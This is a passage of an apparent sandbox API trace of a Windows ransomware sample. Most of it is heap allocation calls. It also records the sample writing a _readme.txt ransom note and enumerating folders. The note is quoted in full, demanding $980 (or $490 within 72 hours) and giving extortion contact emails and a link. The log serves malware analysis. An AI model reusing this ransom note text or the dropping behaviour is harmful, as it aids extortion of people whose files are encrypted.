(HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.602] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0227.602] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.602] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.602] PathFindFileNameW (pszPath="") returned="" [0227.602] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.603] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.603] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.603] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.603] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0227.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.603] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0227.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.604] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.604] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.604] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.604] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.605] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.605] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.605] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.605] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.605] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 